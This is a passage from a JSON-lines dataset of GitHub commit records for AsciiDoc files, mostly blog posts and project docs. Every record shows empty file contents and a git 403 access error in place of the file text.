403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b8b6e8feac0386cddf7124df9329c2f13b1c8a","subject":"Update 2015-01-31-First-Post.adoc","message":"Update 2015-01-31-First-Post.adoc","repos":"conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io","old_file":"_posts\/2015-01-31-First-Post.adoc","new_file":"_posts\/2015-01-31-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/conchitawurst\/conchitawurst.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7544630ff6f71f9b749b080c420342f04b5b15d6","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2729be54d90d7571f2ddff141af9fd4632489be9","subject":"Update 2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","message":"Update 2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","new_file":"_posts\/2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bdf38c537bd89c4324a94784c4c5c577ee2fe4d","subject":"Create SUMMARY.adoc","message":"Create SUMMARY.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"98174e9e51ff6f570f659b3c1d08e4cf4f841ccf","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e010c6be5dfc629dc1150f7a42d18327c10e42c","subject":"Update 2015-12-11-Da-Dom-huck.adoc","message":"Update 2015-12-11-Da-Dom-huck.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-12-11-Da-Dom-huck.adoc","new_file":"_posts\/2015-12-11-Da-Dom-huck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4be5da7c2b94f6bc9133b0932541d9cbc47704ba","subject":"Update 2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","message":"Update 2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","new_file":"_posts\/2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40b0a667f6da45a3dd28e8f0cd56d90f0ee78227","subject":"y2b create post Unboxing The Samsung Galaxy S9 Clone","message":"y2b create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-01-Unboxing%20The%20Samsung%20Galaxy%20S9%20Clone.adoc","new_file":"_posts\/2018-02-01-Unboxing%20The%20Samsung%20Galaxy%20S9%20Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61e093cf2f40bcc196b806e3af1c5c4632e7c651","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,apache\/camel,apache\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel","old_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8e13b683da3d81834b3b62f2c9818d21f64ed23","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc390875ca22eb0330b8546de6057d03fde882d","subject":"Create catalog-usage.adoc","message":"Create catalog-usage.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/catalog-usage.adoc","new_file":"userguide\/subscription\/includes\/catalog-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"465deed84eb3cd30cc2204887da8b902c09319fb","subject":"Update 2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","message":"Update 2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","new_file":"_posts\/2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7546cf1ec7d62df7da9fe2d6e748e3a6c40debdd","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/22\/deref.adoc","new_file":"content\/news\/2022\/04\/22\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fca4388b7b25852c5540e73057ef77677c2ef77c","subject":"Logstash 1\/3 written","message":"Logstash 1\/3 written\n\n","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/2017-07-25-Introduction-to-Logstash.adoc","new_file":"_posts\/2017-07-25-Introduction-to-Logstash.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5c00465c4c5146c7711c296a1946fd8dd0f875d","subject":"Update 2015-02-10-Blog-Title-2.adoc","message":"Update 2015-02-10-Blog-Title-2.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80b6b23b62377da411b2f67cd8523c7013e647ac","subject":"Update 2017-10-19-Inyector-DLL.adoc","message":"Update 2017-10-19-Inyector-DLL.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed6cb5d7a056a99335fc6a430a6dd60e8f37e3a3","subject":"Worked on AMCache documentation","message":"Worked on AMCache documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f37e0c6a1b005bafa780c309a11ab1c242588727","subject":"Fix typo regarding Ordered interface in core-aop.adoc","message":"Fix typo regarding Ordered interface in core-aop.adoc\n\nCloses gh-25759\r\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29ecb0dd9286b399f30179dd212002fe96c489f0","subject":"Update 2015-02-10-Title.adoc","message":"Update 2015-02-10-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Title.adoc","new_file":"_posts\/2015-02-10-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5380fd9372e882523d928cd0cb6f2bc4df1030e6","subject":"users.xml converted to users.adoc","message":"users.xml converted to users.adoc\n","repos":"aalmiray\/Json-lib,aalmiray\/Json-lib","old_file":"subprojects\/guide\/src\/docs\/asciidoc\/users.adoc","new_file":"subprojects\/guide\/src\/docs\/asciidoc\/users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aalmiray\/Json-lib.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fee225ac8fb1d345c06c26b02b3b34f14d944e43","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dca32558a2b349f69ba729d710742f7866c0ac2","subject":"Update 2017-07-20-Alphaskades-Blog.adoc","message":"Update 2017-07-20-Alphaskades-Blog.adoc","repos":"alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io","old_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphaskade\/alphaskade.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f1e3dc0054e5c6d14d7424732a4980f203a83a","subject":"Add README","message":"Add README\n","repos":"lukesanantonio\/inpassing-backend,lukesanantonio\/inpassing-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lukesanantonio\/inpassing-backend.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fe0a944be48f3a0b07a6838ab4789937b5a13d0","subject":"Create README.adoc","message":"Create README.adoc","repos":"ppalaga\/hawkular-ui-services,pavolloffay\/hawkular-ui-services,ppalaga\/hawkular-ui-services,hawkular\/hawkular-ui-services,ammendonca\/hawkular-ui-services,hawkular\/hawkular-ui-services,pavolloffay\/hawkular-ui-services,jpkrohling\/hawkular-ui-services,vrockai\/hawkular-ui-services,lucasponce\/hawkular-ui-services,ammendonca\/hawkular-ui-services,Jiri-Kremser\/hawkular-ui-services,vrockai\/hawkular-ui-services,jpkrohling\/hawkular-ui-services,lucasponce\/hawkular-ui-services,Jiri-Kremser\/hawkular-ui-services","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pavolloffay\/hawkular-ui-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09d30d5e966c0c2106967859e9f8fd52a7ac414c","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"spring\/spring-demo-tx\/readme.adoc","new_file":"spring\/spring-demo-tx\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a8edd483123f8d8b809c15fdc67cb62a6332520","subject":"Add Codacy badge","message":"Add Codacy badge","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81f4594caca7682edf0fe89a2d911a2a3b87b078","subject":"Prec import","message":"Prec import\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69637c5b441ced15f44965f3f85bc1f103c6aa4c","subject":"add dev startup time guide","message":"add dev startup time guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/dev_startup_time.adoc","new_file":"content\/guides\/dev_startup_time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8a869bcda909e7c35f8af4b55e63600a02f49f3f","subject":"Update 2017-01-03-The-Naming-Problem.adoc","message":"Update 2017-01-03-The-Naming-Problem.adoc","repos":"ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog","old_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncomet\/asciiblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ab33e447e2c70d64192fec7e4701c184fe63d9f","subject":"Update 2017-05-31-Naming-Conventions.adoc","message":"Update 2017-05-31-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"441c62c00382c8a77a993ed1da136a11072908a1","subject":"Improve wording in noterc(5)","message":"Improve wording in noterc(5)\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cac6b26e5c0cc01fa446628fac9becc5ea209aa","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb0548fbf10381621e645fe22048843a9f63660a","subject":"y2b create post iPhone X - Something You Should Know Before Buying","message":"y2b create post iPhone X - Something You Should Know Before Buying","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-16-iPhone-X--Something-You-Should-Know-Before-Buying.adoc","new_file":"_posts\/2017-09-16-iPhone-X--Something-You-Should-Know-Before-Buying.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43d03b9ded7265372deee7ebb69896e787e9d976","subject":"Update 2015-06-11-Picturetest.adoc","message":"Update 2015-06-11-Picturetest.adoc","repos":"leomedia\/blog,leomedia\/blog,leomedia\/blog","old_file":"_posts\/2015-06-11-Picturetest.adoc","new_file":"_posts\/2015-06-11-Picturetest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leomedia\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceb92e8a28f9dbbbe3409546baec81e93ea3492b","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d00181e4d85a7abdb8dce0576c423c40c3eb2b9","subject":"Update 2016-06-13-Will-you-remember-me.adoc","message":"Update 2016-06-13-Will-you-remember-me.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-13-Will-you-remember-me.adoc","new_file":"_posts\/2016-06-13-Will-you-remember-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fccfdb7b42f0c0f1b990de8625dc7e976060ad6","subject":"Add symlink","message":"Add symlink\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/changelog.asciidoc","new_file":"doc\/src\/main\/docs\/changelog.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba6fed843e4321b854a51d755b0bcff02e6540e1","subject":"CAMEL-10831: adding documentation for reactive-streams example","message":"CAMEL-10831: adding documentation for reactive-streams example\n","repos":"prashant2402\/camel,cunningt\/camel,pmoerenhout\/camel,driseley\/camel,onders86\/camel,kevinearls\/camel,dmvolod\/camel,gautric\/camel,ullgren\/camel,rmarting\/camel,mgyongyosi\/camel,CodeSmell\/camel,christophd\/camel,prashant2402\/camel,nikhilvibhav\/camel,curso007\/camel,kevinearls\/camel,tlehoux\/camel,pkletsko\/camel,tadayosi\/camel,apache\/camel,lburgazzoli\/camel,drsquidop\/camel,rmarting\/camel,CodeSmell\/camel,curso007\/camel,allancth\/camel,akhettar\/camel,isavin\/camel,NickCis\/camel,jamesnetherton\/camel,mcollovati\/camel,yuruki\/camel,curso007\/camel,Thopap\/camel,anton-k11\/camel,alvinkwekel\/camel,anton-k11\/camel,jkorab\/camel,cunningt\/camel,isavin\/camel,onders86\/camel,drsquidop\/camel,nicolaferraro\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,snurmine\/camel,pkletsko\/camel,jkorab\/camel,acartapanis\/camel,punkhorn\/camel-upstream,ullgren\/camel,kevinearls\/camel,acartapanis\/camel,nicolaferraro\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,apache\/camel,snurmine\/camel,sverkera\/camel,drsquidop\/camel,driseley\/camel,tadayosi\/camel,zregvart\/camel,Fabryprog\/camel,allancth\/camel,nboukhed\/camel,apache\/camel,jkorab\/camel,driseley\/camel,sverkera\/camel,snurmine\/camel,davidkarlsen\/camel,dmvolod\/camel,objectiser\/camel,driseley\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,tdiesler\/camel,anoordover\/camel,salikjan\/camel,jamesnetherton\/camel,driseley\/camel,acartapanis\/camel,punkhorn\/camel-upstream,kevinearls\/camel,Thopap\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,gautric\/camel,pmoerenhout\/camel,tadayosi\/camel,objectiser\/camel,pax95\/camel,jkorab\/camel,mgyongyosi\/camel,akhettar\/camel,Fabryprog\/camel,jonmcewen\/camel,pkletsko\/camel,lburgazzoli\/camel,allancth\/camel,rmarting\/camel,DariusX\/camel,ullgren\/camel,curso007\/camel,isavin\/camel,allancth\/camel,mgyongyosi\/camel,objectiser\/camel,rmarting\/camel,allancth\/camel,pax95\/camel,scranton\/camel,gautric\/camel,curso007\/camel,nboukhed\/camel,anoordover\/camel,tlehoux\/camel,tdiesler\/camel,anoordover\/camel,punkhorn\/camel-upstream,anoordover\/camel,cunningt\/camel,adessaigne\/camel,tdiesler\/camel,driseley\/camel,allancth\/camel,yuruki\/camel,acartapanis\/camel,christophd\/camel,onders86\/camel,scranton\/camel,tlehoux\/camel,CodeSmell\/camel,scranton\/camel,lburgazzoli\/apache-camel,yuruki\/camel,akhettar\/camel,kevinearls\/camel,tdiesler\/camel,scranton\/camel,zregvart\/camel,jkorab\/camel,dmvolod\/camel,pmoerenhout\/camel,lburgazzoli\/camel,objectiser\/camel,pax95\/camel,yuruki\/camel,onders86\/camel,anton-k11\/camel,rmarting\/camel,tadayosi\/camel,davidkarlsen\/camel,anton-k11\/camel,prashant2402\/camel,tadayosi\/camel,gautric\/camel,drsquidop\/camel,alvinkwekel\/camel,CodeSmell\/camel,gnodet\/camel,akhettar\/camel,alvinkwekel\/camel,NickCis\/camel,Thopap\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,davidkarlsen\/camel,jonmcewen\/camel,curso007\/camel,scranton\/camel,snurmine\/camel,drsquidop\/camel,rmarting\/camel,cunningt\/camel,dmvolod\/camel,dmvolod\/camel,Fabryprog\/camel,pax95\/camel,drsquidop\/camel,snurmine\/camel,ullgren\/camel,NickCis\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,zregvart\/camel,NickCis\/camel,tlehoux\/camel,isavin\/camel,anton-k11\/camel,Thopap\/camel,punkhorn\/camel-upstream,gautric\/camel,DariusX\/camel,nikhilvibhav\/camel,mcollovati\/camel,pmoerenhout\/camel,gautric\/camel,akhettar\/camel,Thopap\/camel,yuruki\/camel,lburgazzoli\/apache-camel,snurmine\/camel,mcollovati\/camel,pkletsko\/camel,christophd\/camel,jonmcewen\/camel,isavin\/camel,nicolaferraro\/camel,nboukhed\/camel,jonmcewen\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,anton-k11\/camel,dmvolod\/camel,pkletsko\/camel,jonmcewen\/camel,jamesnetherton\/camel,Fabryprog\/camel,acartapanis\/camel,adessaigne\/camel,nikhilvibhav\/camel,NickCis\/camel,nboukhed\/camel,DariusX\/camel,christophd\/camel,yuruki\/camel,tlehoux\/camel,salikjan\/camel,acartapanis\/camel,akhettar\/camel,anoordover\/camel,Thopap\/camel,NickCis\/camel,nboukhed\/camel,jkorab\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,apache\/camel,gnodet\/camel,alvinkwekel\/camel,pkletsko\/camel,zregvart\/camel,nicolaferraro\/camel,apache\/camel,lburgazzoli\/camel,mgyongyosi\/camel,jonmcewen\/camel,gnodet\/camel,pax95\/camel,kevinearls\/camel,davidkarlsen\/camel,onders86\/camel,nikhilvibhav\/camel,tlehoux\/camel,isavin\/camel,DariusX\/camel,jamesnetherton\/camel,christophd\/camel,lburgazzoli\/camel,scranton\/camel,adessaigne\/camel,prashant2402\/camel,cunningt\/camel,adessaigne\/camel,mgyongyosi\/camel,gnodet\/camel,sverkera\/camel,sverkera\/camel,onders86\/camel,prashant2402\/camel,nboukhed\/camel,prashant2402\/camel,adessaigne\/camel,sverkera\/camel,christophd\/camel","old_file":"examples\/camel-example-reactive-streams\/readme.adoc","new_file":"examples\/camel-example-reactive-streams\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c801a94ce7970819ea03b7ce5a7bf80e021af25a","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 